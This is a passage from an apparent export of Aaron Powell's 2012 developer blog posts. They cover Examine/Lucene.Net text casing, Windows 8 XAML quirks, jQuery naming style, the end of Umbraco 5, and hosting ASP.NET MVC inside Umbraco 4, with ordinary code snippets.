In hindsight this is not really a great idea, it really should be the responsibility of the Lucene Analyzer to handle this for you.\nMany of the common Lucene.Net analyzers actually do automatic lowercasing of content, these analysers are:\nStandardAnalyzer StopAnalyzer SimpleAnalyzer So if you’re using the standard Examine config you’ll find yourself using the StandardAnalyzer and still have your content lowercased.\nThis means that there’s no need to Lucene to concern itself about case sensitivity when searching, everything is parsed by the analyzer (field terms and queries) and you’ll get more matches.\nSo how do I get around this? Now that we’ve seen why all your content is generally lower case, how can we work with it in the original format and display it back to the UI?\nWell we need some way in which we can have the field data stored without the analyzer screwing around with it.\nNote: This doesn’t need to be done if you’re using an analyzer which doesn’t have a LowerCaseTokenizer or LowercaseFilter. If you’re using a different analyzer, like KeywordAnalyzer then this post wont cover what you’re after (since the KeywordAnalyzer isn’t lowercasing, you’re actually using an out-dated version of Examine, I recommend you grab the latest release :)). More information on Analyzers can be found at https://www.aaron-powell.com/lucene-analyzer\nLuckily we’ve got some hooks into Examine to allow us to do what we need here, it’s in the form of an event on the Examine.LuceneEngine.Providers.LuceneIndexer, called DocumentWriting. Note that this event is on the LuceneIndexer, not the BaseIndexProvider. This event is Lucene.Net specific and not logical on the base class which is agnostic of any other framework.\nWhat we can do with this event is interact directly with Lucene.Net while Examine is working with it. You’ll need to have a bit of an understanding of how to work with a Lucene.Net Document (and for that I’d recommend having a read of this article from me: https://www.aaron-powell.com/documents-in-lucene-net), cuz what you’re able to do is play with Lucene.Net… Feel the power!\nSo we can attach the event handler the same way as you would do any other event in Umbraco, using an Action Handler:\npublic class UmbracoEvents : ApplicationBase { public UmbracoEvents() { var indexer = (LuceneIndexer)ExamineManager.Instance.IndexProviderCollection["DefaultIndexer"]; indexer.DocumentWriting +=new System.EventHandler(indexer_DocumentWriting); } } To do this we’ve got to cast the indexer so we’ve got the Lucene version to work with, then we’re attaching to our event handler. Let’s have a look at the event handler\nvoid indexer_DocumentWriting(object sender, DocumentWritingEventArgs e) { //grab out lucene document from the event arguments var doc = e.Document; //the e.Fields dictionary is all the fields which are about to be inserted into Lucene.Net //we'll grab out the "bodyContent" one, if there is one to be indexed if(e.Fields.ContainsKey("bodyContent")) { string content = e.Fields["bodyContent"]; //Give the field a name which you'll be able to easily remember //also, we're telling Lucene to just put this data in, nothing more doc.Add(new Field("__bodyContent", content, Field.Store.YES, Field.Index.NOT_ANALYZED)); } } And that’s how you can push data in. 
I’d recommend that you do a conditional check to ensure that the property you’re looking for does exist in the Fields property of the event args, unless you’re 100% sure that it appears on all the objects which you’re indexing.\nLastly we need to display that on the UI, well it’s easy, rather than accessing the bodyContent property of the SearchResults, use the __bodyContent and you’ll get your unanalyzed version.\nConclusion Here we’ve looked at how we can use the Examine events to interact with the Lucene.Net Document. We’ve decided that we want to push in unanalyzed text, but you could use this idea to really tweak your Lucene.Net document. But really playing with the Document is not recommended unless you really know what you’re doing ;).\n", "id": "2012-09-05-text-casing-and-examine" }, { "title": "Forcing Windows 8 soft keyboard to hide", "url": "https://www.aaron-powell.com/posts/2012-08-31-forcing-windows-8-keyboard-to-hide/", "date": "Fri, 31 Aug 2012 00:00:00 +0000", "tags": [ "xaml" ], "description": "Hack of the day goes to how you hide the soft keyboard on a Windows 8 application", "content": "We had a bug raised that when the user presses enter on the sign in screen the login process begins but the soft keyboard (the on-screen keyboard) doesn’t get dismissed so the user gets the impression they can keep interacting with it. Through some Monkey Testing this produced a bug where the application would crash because it would fire off multiple requests to log in as they could keep hitting enter and eventually crashing the application.\nThe logical solution is to hide the soft keyboard.\nBut here’s a question, how would you hide the keyboard in Windows 8 XAML?\nThought #1 - remove focus I’m a web guy so when I want to defocus an element I use blur, so that’s my first point of call.\nBut of course there’s no Blur method on XAML elements. Strike that off the list.\nThought #2 - change focus My research led me to Focus as a method on controls which takes a FocusState enum value, one of the properties being Unfocused. Bingo!\nBut every time I set it the app would crash with an AccessViolationException (or something to that effect). Great, that’s no help now is it! Moving on…\nThought #3 - FocusManager Fine, well apparently WPF has a FocusManager that you can also use to change focus. This is also available in Windows 8 XAML, but do you think that’d have the SetFocusedElement on it?\nNo, that’d be too simple! Guess we can strike this one down too.\nOne hack to rule them all Since you don’t have access to the soft keyboard programmatically and every attempt made to change focus was either throwing exceptions or simply missing anything useful it was time to think outside the box.\nIt was time for a hack!\nA funny thing about input controls in Windows 8 XAML is if they are not enabled, i.e. read-only, the soft keyboard won’t display for them. Well that makes sense doesn’t it and hey, they were bound to get something right eventually!\nThis gave me an idea, let’s make the textbox read-only. The only problem is this has to be done as early as possible, even before we validate, to prevent undesired keyboard mashing. This also means that our validation won’t be done so there’s a chance that we’ll have a failure in sign in and need to make the fields writeable again.\nSo all we did was add this to our event handler:\nusername.IsEnabled = password.IsEnabled = false; username.IsEnabled = password.IsEnabled = true; Yes, one line after the other like that and you hide your soft keyboard.
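In context the hack might look something like this (a rough sketch; the username/password controls and the two IsEnabled lines are from above, while SignIn_Click and BeginSignIn are hypothetical placeholders for the real handler and login call):

```csharp
private void SignIn_Click(object sender, RoutedEventArgs e)
{
    // Disabling the focused inputs is what forces the soft keyboard to dismiss...
    username.IsEnabled = password.IsEnabled = false;

    // ...and re-enabling them straight away keeps the form usable if the
    // sign in fails and the user needs to try again.
    username.IsEnabled = password.IsEnabled = true;

    BeginSignIn(); // hypothetical: kicks off the actual login request
}
```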
facepalm\nTL;DR Want to hide your soft keyboard in Windows 8 XAML? Toggle IsEnabled off and straight back on for the focused input controls.\n", "id": "2012-08-31-forcing-windows-8-keyboard-to-hide" }, { "title": "WebView, oh you!", "url": "https://www.aaron-powell.com/posts/2012-08-28-webview-oh-you/", "date": "Tue, 28 Aug 2012 00:00:00 +0000", "tags": [ "xaml", "facepalm" ], "description": "Oh that WebView control is a funny one", "content": "Today can only be summarized by this:\nWhile I’m having my fun in the dark side of development doing XAML I hit something really whacky today, using the WebView control.\nHere be dragons The WebView control seems to be a little bit special, and not really special in a good way and it seems others have also found it limiting.\nBut I hit an interesting problem with the WebView control rendering, in particular rendering it in a settings panel. Long story short it didn’t display.\nHere’s the XAML:\n<UserControl> <Grid> <WebView Source="https://www.aaron-powell.com" /> </Grid> </UserControl> (I omitted the namespace guff for you)\nSure I might not be a XAML wiz but I’m pretty sure that that should work, and according to my limited knowledge of how layout works this would be fine right? My WebView doesn’t have sizes specified so it should fill out to the whole area.\nWell you’re wrong. It would seem that when you use a WebView control that doesn’t have a size set on it, nor on its parents, it just goes 0x0.\nThis coupled with the WebView’s inability to animate with the rest of the controls in its container leaves me just bemused.\nConclusion Avoid the WebView control. Avoid it at all costs.\n", "id": "2012-08-28-webview-oh-you" }, { "title": "XAML by a web guy", "url": "https://www.aaron-powell.com/posts/2012-08-20-xaml-by-a-web-guy/", "date": "Mon, 20 Aug 2012 00:00:00 +0000", "tags": [ "xaml" ], "description": "So I'm starting to learn XAML...", "content": "A few weeks ago a new project came up at work which I moved onto, a project which is XAML based. More specifically Windows 8 XAML and having built a Windows 8 app using HTML and JavaScript I was keen to give it a crack.\nNow I’m very much a web guy. If you read my blog you’ll know that I spend more time blogging about JavaScript than anything else. But in an effort to be a better developer I thought it was worthwhile diving into the other kind of angled brackets and give this thing a go, and I want to share some thoughts of mine having spent two weeks doing XAML development (for the record this isn’t the first time I’ve looked at XAML, I looked at it back in about early 2010, did some playing with XAML 1.0, I even own a book on it, but I never got very far :P).\nXAML is verbose Oh… my… god.\nI’ve spent my entire development career doing HTML, and quite a lot of that I spent doing HTML with Umbraco, which obviously meant that I was writing a lot of XSLT (this was about 4 - 5 years ago, when there was no alternative) and in comparison to XAML, XSLT is a shining pillar of conciseness.\nI can only assume that this is why there are two GUI tools for generating XAML, having to hand-craft complex XAML files would be time consuming beyond belief (although from my understanding most people do hand craft them as the GUI tools are pretty flaky).
Here’s an example:\n<ObjectAnimationUsingKeyFrames Storyboard.TargetProperty="(UIElement.Visibility)" Storyboard.TargetName="someElement"> <DiscreteObjectKeyFrame KeyTime="0"> <DiscreteObjectKeyFrame.Value> <Visibility>Visible</Visibility> </DiscreteObjectKeyFrame.Value> </DiscreteObjectKeyFrame> </ObjectAnimationUsingKeyFrames> That’s a snippet from a visual state to change an element from hidden to visible. Now this is how to do it in XAML, which leads me to my next point.\nA dozen ways to skin a cat Visual states are really cool, they are quite powerful for doing the various animations that we’re using in our application but to me they are really clumsy to write (seriously, you’re looking at dozens of lines of XAML to make even a simple state of hiding a few elements and showing a few elements). This is where something like Blend comes into play (when it’s not crashing), it’s quite easy to create a simple visual state.\nAlternatively I could use code to manually manipulate those properties, it’s much more concise to do so (1 line vs the above 7) but then you’re ending up with stuff in your code behind or you’re losing the power of animations.\nAnd then there’s binding…\nBindings Oh… my… god.\nI don’t understand how XAML, in any of its four incarnations, doesn’t have a better solution for this. Back on our Visual States, say I’ve got a multi-stage form, each stage has a new Visual State to show the appropriate fields, well logically I’d want to use an enum to set the current step and be able to tie that back to the UI… Right?\nYeah you’d think so, but no. There’s no way in the box to do the mapping between an enum and a Visual State. You end up with a lovely whack of code behind that watches for property change events and calls visual state transitions. Woo…\nEvents I come from a world of the DOM where event wireup is pretty fucked. IE always did it one way, really old IE did it another and then there was the spec. The only nice thing was there was only one type of event. XAML though seems to have two independent eventing models, traditional .NET events and commands. Both seem to be first-class citizens, but commands seem to have been conceived outside of wedlock and thus treated like a bastard.\nSome elements seem to implement commands as well as events, others just implement events. It’s quite frustrating, the fact that bindings are a common way to wire up commands to actions (like button clicks). But events can’t be bound, so you end up having to rely on code-behind or custom solutions. Neither of these are a great resolution, I just don’t get why it’s not in the box.\nControls Now this just baffles me, as I said at the top this is Windows 8 XAML so I’m sure it’s a bit different in the other flavours but the controls available are just whacky.\nHere’s an example, there’s no built-in control that restricts an input to just containing numerical values. Maybe I’m used to the web but I think this makes sense:\n<input type="number" /> In an HTML5-enabled browser this does a few things:\nIt will only allow numerical values It switches keyboards on soft-keyboard devices But there’s nothing built in that will do this in Windows 8 XAML. Or how about a date picker? You know that’s kind of a common scenario in an application, to be able to select a date… And apparently that didn’t make it until .NET 4.0 anyway.\nValidation The fact that there’s no built in validation floored me. This is a problem that was solved in ASP.Net in what, version 1.0?
You know the idea of a required field shouldn’t be that hard… MVC did a great job including data annotations and building up that client side to integrate with jQuery validation (or their own validation framework as it was back in the day).\nBut there’s nothing in XAML for validation, no required fields, no regex validation, no data annotations for building up validation rules for your view model. It’s all up to you to solve on your own.\nBindings I must say that bindings are pretty sweet, coming from HTML and JavaScript I can see why things like Knockout.js were written, the ability to componentise a UI and link data up is very nice. I also think value converters are pretty neat, a good way to produce a global solution to consistent bindings.\nI have one major problem with bindings, debugging. It’s 2012 and the “debugging” experience for bindings is to look at the Visual Studio Output window. I shit you not! I’ve managed to pretty much avoid needing the Output window ever since VS2003 except when I was looking into compiler errors but instead I’ve been keeping my eye on it every time a binding doesn’t do what I expect it to do.\nHow on earth does this not have a debugging experience? I remember the demos from Silverlight 5 showing it off but it’s apparently not in VS 2012 from what I can see, it seems like a massive oversight.\nThis leads me to the next WTF I’ve found in Windows 8 XAML (I think it’s only the case in Windows 8 XAML), you can’t bind Nullable<T>. You would not believe how long that took me to find out but yep, if you have a nullable DateTime, int, float, etc don’t expect to be able to bind to it. I’ve had mixed success with Dependency Properties over INotifyPropertyChanged but the majority of my tests have shown it to fail.\nWrap up Although my “full time” XAML experience is still fairly limited I can’t help but keep looking at it in a completely bemused fashion. While my experience is localised to Windows 8 XAML, I’m constantly shocked at how half-baked it feels. Some people might argue that Windows 8 XAML is a v1 product and should be treated as such but seriously this is the fourth incarnation of XAML, fourth (WPF, Silverlight, Windows Phone 7 and now Windows 8)!\nBut don’t get me wrong, I’m having a heap of fun, this is all relatively new to me, but given the state that XAML is in I can see why HTML is a first-class citizen in Windows 8, at least it’s a fully featured markup engine.\nPS: Yes I know many of my problems can be solved with existing open source projects. My point is that a lot of the problems I’ve come across are not edge cases, they are things I’d expect my UI layer to do out of the box.
I wrote the code and draft while driving back from the retreat so it wasn’t very deeply investigated.\nBasically it was done as a proof of concept.\nWell today I was chatting with someone who was wanting to take the PoC and try it in production and through chatting we learnt a few things about what I initially wrote about that are important to know if you’re wanting to try it as well.\nWatch your routes There was a problem with the site: whenever you hit the root of the site, the / route, the controller action was being executed. Luckily this is an easy fix. The MVC route registration looked like this:\nroutes.MapRoute( "Default", "{controller}/{action}/{id}", new { controller = "Home", action = "Index", id = "" } ); Now if you know your MVC you’ll know that that matches the / route as well in MVC since we’ve given a default controller and action (it’s also why /home matches the Index action on Home). So what’s interesting here is that MVC’s routing engine takes priority over the Umbraco one.\nTo fix it you need to add some kind of static prefix to the route, what’s probably the easiest is to hard code the controller name, like so:\nroutes.MapRoute( "Default", "home/{action}/{id}", new { controller = "Home", action = "Index", id = "" } ); This tells MVC that anything /home will go to the Home controller, it can’t go anywhere else.\nUmbraco reserved paths The above point leads onto this point, as I said it turns out that the MVC routes took over the Umbraco ones, this means that you don’t have to add an ignore route for Umbraco.\nIn the last post I said you needed to add ~/home like this:\n<add key="umbracoReservedPaths" value="~/umbraco,~/install/,~/home" /> Well seems I was wrong about that, sorry!\nConclusion What I’ve blogged is still very much a proof of concept but it seems that some people are thinking that it is actually a valid concept. This is a few lessons learnt from a project actually trying it out, I hope the guys blog about it once they are done but we’ll see.\nIf you learn any more yourself let me know!\n", "id": "2012-07-11-using-mvc-in-umbraco-4-revisited" }, { "title": "Stop using Hungarian jQuery!", "url": "https://www.aaron-powell.com/posts/2012-06-27-hungarian-jquery/", "date": "Wed, 27 Jun 2012 00:00:00 +0000", "tags": [ "jquery", "rant", "javascript" ], "description": "The code smell that's creeping into JavaScript development", "content": "I’ve been in software development for long enough that I remember a time when Hungarian Notation was all the rage and we’d write strFirstName, iAge and objPerson, I also remember it dying, and dying for a good reason.\nThe rise of Hungarian jQuery This is something that I’ve been noticing more and more in JavaScript code that I work with, code that looks like this:\nvar $foo = $('.foo'); //do something with $foo Do you see what I’m referring to, the prefixing of $ onto a jQuery variable with the purpose of indicating that it’s a jQuery object.
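For reference, here are the two styles side by side (an illustrative sketch reusing the strFirstName/iAge/objPerson and $foo names from above; the values are made up):

```javascript
// Hungarian Notation, as it used to be written
var strFirstName = 'Aaron';
var iAge = 30;
var objPerson = { firstName: strFirstName, age: iAge };

// Hungarian jQuery: the same idea, but applied only to jQuery objects
var $foo = $('.foo');
//do something with $foo
```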
To me this looks just like using Hungarian Notation, that just like we use to prefix str to denote a variable as a string we are prefixing $ to denote a jQuery object.\nAnalysing Hungarian jQuery I’ve been calling this pattern Hungarian jQuery since when it’s being used people aren’t really following Hungarian notation, they don’t add the prefix elsewhere, it’s just specific to jQuery in their code.\nThe primary argument I’ve seen behind this is the same that Hungarian Notation took off to start with, editors for a long time were pretty shitty so it was hard to know what a variable type was, you’d constantly be scrolling up and down to work that out. A lot of the JavaScript editors we use (Visual Studio, Sublime Text 2, etc) don’t have as good JavaScript support as they do other languages. Generally this comes from the dynamic nature of JavaScript and that it can be quite hard to work out what the type really is so the use of the $ prefix helps us identify it as a jQuery object.\nBut it begs the question, if we use $ to help identify a jQuery object then why aren’t we using other prefixes to identify other variable types? What makes the jQuery objects in your code more important that the other objects which you have? And more to the point since JavaScript variables are dynamic you can change their type so what happens if you reassign the $foo to something that’s not of jQuery origins? I wouldn’t recommend that as you’re probably going to make a royal mess of your application but the fact remains that you can do it and there are valid scenarios for it.\nThere are other arguments behind the use of Hungarian jQuery, one of those is scoping, say we’ve got this code block:\n$('foo').on('click', 'a', function () { var $this = $(this); $.get('/bar', function (result) { $this.html(result); }); }); So the reason behind this is we have a click handler and inside that click handler we want to perform an AJAX request and then populate the HTML of the clicked element with something from the server (crappy example but you get the gist). Because of the way JavaScript scoping works by the time the AJAX response handler is called the this context is no longer the clicked element so we can’t work with it, instead we need to capture it in the closure scope but because this is a reserved word we can’t reassign it, instead we create a jQuery version of it and since we are making a jQuery version we append the $ to the start. Personally I’d write the code this way:\n$('foo').on('click', 'a', function () { var target = $(this); $.get('/bar', function (result) { target.html(result); }); }); It’s no longer using Hungarian Notation but still conveying the same point.\nConclusionI really dislike Hungarian notation, I was glad when the war was won and we no longer had to prefix our variables with silly things (don’t even get me started on m_) but quite often I see it creeping back into the JavaScript developers coding style. 
So next time you think “I’ll prefix with $ so I know it’s jQuery” ask yourself why you didn’t also prefix that bool with b so you knew it was a bool and that number with i so you knew it’s a number.\n", "id": "2012-06-27-hungarian-jquery" }, { "title": "I helped kill Umbraco 5", "url": "https://www.aaron-powell.com/posts/2012-06-25-i-helped-kill-umbraco-5/", "date": "Mon, 25 Jun 2012 00:00:00 +0000", "tags": [ "umbraco", "umbraco-5", "opinionated" ], "description": "Hi, my name's Aaron Powell and I was involved in killing Umbraco 5.", "content": "Hi, my name’s Aaron Powell and I was involved in killing Umbraco 5.\nBackground If you’re new to this blog you may not have heard of my before so here’s a bit of background. I’ve been involved with Umbraco for about 4 years now. I originally joined the project to create LINQ to Umbraco, a somewhat ill-fated experiment into Code First development. I’ve presented at every CodeGarden since my first one in 2009 on a range of topics from LINQ to Umbraco to unit testing Umbraco and this year on Signalr and RavenDB.\nI was also involved in some of the initial design and development of Umbraco 5 and worked with Shannon (mostly) as a sounding board when he needed to bounce ideas off someone while working on Umbraco 5.\nBut late last year I announced that I was leaving the project and it was bred out of frustrations towards the direction Umbraco 5 was going and the role that someone like myself, an outsider to the HQ, could maintain on the project. Ultimately I didn’t believe I could contribute in the way I saw as useful to so it was decided that I would leave the project.\nEven after leaving the project I still stayed in contact with many of the people on it, I had a lot of respect for Niels, Shannon, Matt, etc and they are all people I consider friends who I’d often chat with on Skype or various other mediums. I then decided to build a commercial extension for Umbraco 5 as a way to provide feedback on the way the project was shaping up (and to make some money on the side :P).\nReturning to Umbraco A few months ago Niels contacted me with a proposition, I come to CodeGarden 12 and the retreat before hand to help work through the issues that the HQ was having with Umbraco 5 and the issues I had which caused me to leave in the first place. I was quite taken aback by this, I’d done a bit of venting on twitter while building my commercial package and I hadn’t thought that I’d consider going back to CodeGarden. But after a few discussions I believed that I could do something useful for the tens of thousands of Umbraco users out there by bringing my voice to the table.\nBut it was clear that just because I was coming to “kick up a storm” didn’t mean that I would return to the project in the manner I previously had been involved.\nThe retreat First off I’m happy to say at this retreat no one saw my naked ass and I think everyone who attended was grateful for that.\nSecondly this year we had a good mixed bag of people at the retreat, there was everyone from HQ employees to contributors to package developers to site builders and people just passionate about open source and we all were involved in various discussions.\nWhat is Umbraco? One of the discussions I was involved in was (from my point of view) really important in helping define where Umbraco would go in the future, we had a discussion about what is Umbraco? While you might think that this is an easy question to answer “It’s a CMS” but that’s really only a small part of the picture. 
Here are some of the learnings which came out of this discussion:\nUmbraco is a piece of software Yes this is a logical conclusion, Umbraco is a project that is released as Open Source that allows you to run a CMS. But most importantly it’s a simple piece of software. Unlike many other CMS’s available you don’t have mark-up generated for you, someone said Umbraco respects the web in this manner, it gives you freedom to do that crazy design that your designer has come up with. Also through its simplicity it becomes really powerful, you can build anything from a 5 page brochureware site to a thousand view per second site because there’s so many extensibility points available for different kinds of developers while still retaining some level of control Umbraco is community This may sound a bit wanky at first, a bit like marketing fluff but having been involved with Umbraco for so long I am still always amazed at just how passionate the people who use it are, and just how willing Umbraco users are to help other Umbraco users. Doug Robar made a point about this, that when it’s late at night for him and he’s stuck with a project there’s always someone around that he can ping for advice even if they are on the other side of the world; no matter what time of day it is there always seems to be someone around willing to help out Umbraco is the packages Niels touched on this in the keynote this year but when people think Umbraco they also think of things like uComponents and DAMP, these kinds of things are almost invaluable to the Umbraco developer and without them we’d waste a lot of time doing the boring stuff over and over again So really Umbraco is a sum of its parts, without these three aspects it wouldn’t be the same, we wouldn’t get behind it in the way that can have 380 people attend a conference. Then when we turned these learnings toward Umbraco 5 we could see we didn’t have the same things there, which is why it never really felt like Umbraco.\nWhat’s awesome about v5 Another discussion I was involved in (yes I’m aware that I keep saying things like “Discussions I was involved with” as though I was a critical factor in them, that’s not the case, we had plenty of other discussions going on which were equally as important I just wasn’t in them so can’t talk about them :P) was looking at what made v5 such a good project (this was also an open space topic from CG12 coincidentally!) and the more we looked at it the more we started to see that the things that made v5 compelling were really just approaching v4 concepts with 8 years of learning, things like:\nProperty editors can save multiple values natively Trees/ applications/ macros and templates reside on disk Simple back-office sections There’s a defined structure to where packages reside Really what we were seeing is that most people didn’t care that the underlying systems could be swapped from nHibernate to something else, or that there was this really cool new unit-of-work concept, people spend their time configuring and extending the back office and in the 1% of times that they really need to scale across multiple virtual servers on the cloud Umbraco may not even be the best fit for the project.\nThe community needed a better voice While the community has had Our for a few years now it has always been focused on the user community, how do I solve problems with Umbraco, but it was never very good when it came to solving the problems in Umbraco.
This topic was born more out of discussions with various people than a structured discussion but ultimately contributors, HQ and implementers alike wanted a way to discuss the direction of Umbraco itself, people have businesses built around it so when changes happen that they don’t understand (the what or the why) it can be a nervous time.\nSome of this is what happened throughout the v5 development process, decisions were made that the community felt they didn’t have a say in, that they assumed were for the best but they didn’t really know; ultimately they felt out of control. To this end we decided to set up the Umbraco-dev mailing list so that the community has somewhere they can raise concerns directly with the people developing the product.\nThe downfall of v5 Hopefully you’ve started to see the picture I’ve been painting. There were many other discussions but I think these three really highlight how the decision was reached. Umbraco is a cool piece of software but without the community involved in it, to them it was an unknown. There were lots of cool things in v5 but generally speaking they were evolutions on what people use day-to-day and as cool as other parts of v5 might have been it didn’t really bother most people as it didn’t impact their average Umbraco project.\nSo we started to think about how to rectify this and we discussed this more than anything. We looked at whether we could remove parts of v5 to make it simpler, to make it more enticing to your average Umbraco user. We looked at how to get more people involved in the processes, take the project back from being a HQ-owned initiative and get more community members involved. Many angles were looked at as to what would be needed to ensure v5’s success, and believe me I very much pushed for this having a vested commercial interest in this. But the more we looked the more we began to realise that forcing v5 to go on wouldn’t be in the best interest of everyone no matter how hard we tried.\nIn the end there was only a single decision that sat just right, Umbraco 5 would be discontinued.\nAlong came CodeGarden I can tell you that the lead up to the keynote this year was the most surreal experience I’ve had in a long time. We knew what was going to be announced but we had no idea how it would be taken by the community. CG12 had been touted as a v5 conference so on a scale of 1 to murderous just what was the crowd going to be like after the announcement? I applaud Niels for how he handled it, I can’t imagine it’s easy being up in front of that many people and delivering the news that Umbraco 5 was to be discontinued (if you haven’t yet I recommend watching the keynote) and I was standing with some of the HQ and retreat guys just waiting for the angry mob.\nBut it never came.\nWhile I’m not saying that it was all sunshine and rainbows, there are people who are really annoyed at the decision, there are people who won’t ever use Umbraco again, but having been at CodeGarden, in the room with the other 380 attendees I can tell you that without a doubt by the end of day one the mood was positive, the weird tension during registration and before the keynote was gone and people honestly seemed happy with the decision, there was a sense of relief in the room.\nConclusion As I said at the start my name is Aaron Powell and I was involved with killing Umbraco 5.
I know that there are people out there mad about the decision but I also know that for every angry person there’s a dozen happy people and that was why I came back this year to be involved with a project that makes people happy. I don’t deny that the next few months will be rough while the v4 project “restarts” but I’m excited to be a part of it again.\nI hope that this story has given you another insight into just how the decision came to be because the more open everyone is about this the better people can understand the reasoning behind it.\n", "id": "2012-06-25-i-helped-kill-umbraco-5" }, { "title": "Introducing the Umbraco contributor mailing list", "url": "https://www.aaron-powell.com/posts/2012-06-13-introducing-umbraco-contributor-list/", "date": "Wed, 13 Jun 2012 00:00:00 +0000", "tags": [ "umbraco" ], "description": "Keen to discuss contributing to Umbraco's core? Join the discussion now!", "content": "TL;DR Want to be involved in driving the Umbraco Open Source project? Join the Google Group.\nAll the details One of the things that has come out of the Umbraco retreat this year is that as a community we need to get more involved in the direction of the open source project. This has always been something that many people have wanted to do but the problem has been how do you get involved.\nFor many years there has been the Umbraco Core but no one was really sure about what it was and who really was involved. This led to a limitation with getting the community excited and involved in working on the product of Umbraco itself as we often took the attitude that the core had it under control.\nWell it’s time to change that, and in doing so I’m announcing the start of the Umbraco developer mailing list, which is running on Google Groups.\nWith this we need to get a few things clear though:\nThis is a mailing list for discussing the open source project and not the usage of Umbraco; if you have a question about the usage of Umbraco then please use the excellent community site, our.umbraco.org. The moderators will close threads that are of this nature and redirect you to the appropriate forum Anyone can join. Got a question about the direction of the project this is the place to ask, got a feature to propose this is the place to discuss it, want to know how to get involved in submitting patches then ask it here Make sure you search before you ask, maybe someone else had that idea so check out their discussion This is the friendly CMS so remember to be an adult and play nice, the moderators will tell you off if you’re being out of line What does this mean for the Core? So you may be wondering what is the Core now? Well the goals of the Core haven’t changed, they were always about driving the Umbraco project but now we’re trying to make it easier for anyone to consider themselves part of the process.
Ultimately the Core are the ones who have final say, they’ll be committing the code, managing the mailing list, handling pull requests and that kind of stuff.\nContributing code If you’re wanting to contribute code but you’re not sure about how to go about it then here’s a few useful links:\nUsing TortoiseHG with Mercurial Using the Mercurial command line and another article Here’s a Tekpub video on using Mercurial on CodePlex My talk from CodeGarden 11 on collaboration in Umbraco ", "id": "2012-06-13-introducing-umbraco-contributor-list" }, { "title": "Using ASP.NET MVC in Umbraco 4", "url": "https://www.aaron-powell.com/posts/2012-06-12-using-mvc-in-umbraco-4/", "date": "Tue, 12 Jun 2012 00:00:00 +0000", "tags": [ "umbraco", "asp.net-mvc" ], "description": "How to combine ASP.Net MVC applications with an Umbraco project", "content": "By now you’ve probably heard the decision of Umbraco HQ to no longer invest resources in Umbraco MVC and instead the focus (from both HQ and the community) is on making Umbraco 4 a better product.\nOne thing that a lot of developers were waiting for with Umbraco was the ability to use MVC with Umbraco. Over the course of the retreat we looked at where this motivation came from and one of the things that we seemed to agree on is that most Umbraco users aren’t concerned about whether the underlying technology is MVC or not, they just want to be able to write clean mark up, which MVC, or more importantly Razor, allows you to do.\nBut there still is a valid reason for wanting to use MVC when building applications in Umbraco, and by that I mean if you’re building say a booking platform you may prefer to write that part of your application in MVC. This application side of your website may not really need content management so the reliance on Umbraco is very little. So how do you go about doing this, using MVC for your web application inside an Umbraco CMS?\nIt’s all ASP.NET If you’ve been following the movements of ASP.NET in recent months you’ll have seen a lot of emphasis by the ASP.NET team on the idea of One ASP.NET, that WebForms, MVC, WebAPI and WebPages are all part of the same stack and all can play nicely together. Scott Hanselman has blogged in the past on creating hybrid ASP.NET applications which allow you to host MVC alongside WebForms and that’s what I want to look at.\nSimply put…\nBefore we begin This is not a solution for everybody, what I’m going to look at through the rest of this blog is very much a proof of concept, I haven’t deployed a site doing this, I’m writing this blog post in the back of a car while driving to Copenhagen. It’s designed as an idea to hopefully inspire more people to get involved. It will also require you to open up Visual Studio and do some coding, but I expect that if you’re planning on building an MVC application that’s a known fact.\nI’m also going to make the assumption that you are familiar with MVC, if you’re not please start by checking out the guides at www.asp.net/mvc\nFinally:\nGetting Started First things first I’m going to create an empty ASP.NET site. I’m using Visual Studio 2012 which comes with a completely empty project template:\nIf you aren’t running Visual Studio 2012 don’t fear, you can always use one of the other web project types and delete the files, here’s what my solution explorer looks like now:\nNext up grab yourself a copy of Umbraco 4, I’ve used Umbraco 4.7.2 for this but as newer versions come out some of this may change.
Once you’ve downloaded Umbraco 4.7.2 (you can use Web Platform Installer as well) copy all the files into the folder which your project resides in. Make sure you replace the web.config with the Umbraco provided one. Also you don’t need to add any of the Umbraco files or folders to Visual Studio if you don’t want.\nYou’re now ready to go with creating your Umbraco instance, feel free to setup your database, document types, etc.\nGetting MVC installedSo now that we’ve got our Umbraco instance running we want to get our MVC application integrated. The first thing I want to do is to add MVC to the project, for this I’m going to use NuGet as it’ll greatly reduce the effort in adding references, but you can do it manually if you require.\nGo ahead an install the Microsoft.AspNet.Mvc NuGet package:\nNote: I used the Package Management Console, but you could just as easily use the GUI tool. Assuming you have NuGet installed both options are available from Tools > Library Package Manager.\nNow that that is done go ahead and create these folders:\nApp_Start Controllers Views Setting up our routesGenerally speaking you will create your routes inside the Global.asax file. Umbraco has been pretty notorious about how it handles this file so I found it easier to not register my routes there, instead I’m going to register my routes using the PreApplicationStartMethod attribute and this is why we created the App_Start folder.\nStart off by creating an empty class in there:\nnamespace WebApplication2.App_Start { public class RouteSetup { } } Now add a new method that will be used by the PreApplicationStartMethod attribute:\nnamespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { } } } Note: This method must be both public and static.\nNext up, add the attribute:\nusing System.Web;\t[assembly: PreApplicationStartMethod(typeof(WebApplication2.App_Start.RouteSetup), "Setup")] namespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { } } } What we’ve done here is told ASP.NET that we have a class which has a method we want to run when the application is starting up, and with this we can start injecting some routes:\nusing System.Web; using System.Web.Mvc; using System.Web.Routing; [assembly: PreApplicationStartMethod(typeof(WebApplication2.App_Start.RouteSetup), "Setup")] namespace WebApplication2.App_Start { public class RouteSetup { public static void Setup() { RouteTable.Routes.MapRoute( "Default", // Route name "{controller}/{action}/{id}", // URL with parameters new { controller = "Home", action = "Index", id = UrlParameter.Optional } // Parameter defaults ); } } } I’ve added a couple of using statements and I’ve also added a single route, here you can define as many routes as you want, go as crazy as you need for your application routing. But there’s still one more thing we need to do with the routing, we need to make sure Umbraco will also ignore it. The Umbraco routing engine is pretty greedy, it wants to handle everything, the problem is that this isn’t an Umbraco route so we don’t want it to be handled there. Luckily this is easy to do, open up the Web.config and we’ll change the umbracoReservedPaths appSetting:\n<add key="umbracoReservedPaths" value="~/umbraco,~/install/,~/home" /> Note: The more complex your routes the more you’ll need to update this. It might be advisable to put all your routes behind a certain prefix. I’ve also not tested this with MVC Areas so I have no idea if that’ll work. 
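As a sketch of that advice, keeping every MVC route behind a single static prefix (app here is purely an example name) means only one reserved path ever needs maintaining:

```csharp
// All of the application's MVC routes live under /app, so the Web.config
// entry only needs one extra reserved path:
// <add key="umbracoReservedPaths" value="~/umbraco,~/install/,~/app" />
RouteTable.Routes.MapRoute(
    "Default",                        // Route name
    "app/{controller}/{action}/{id}", // URL with parameters, always under /app
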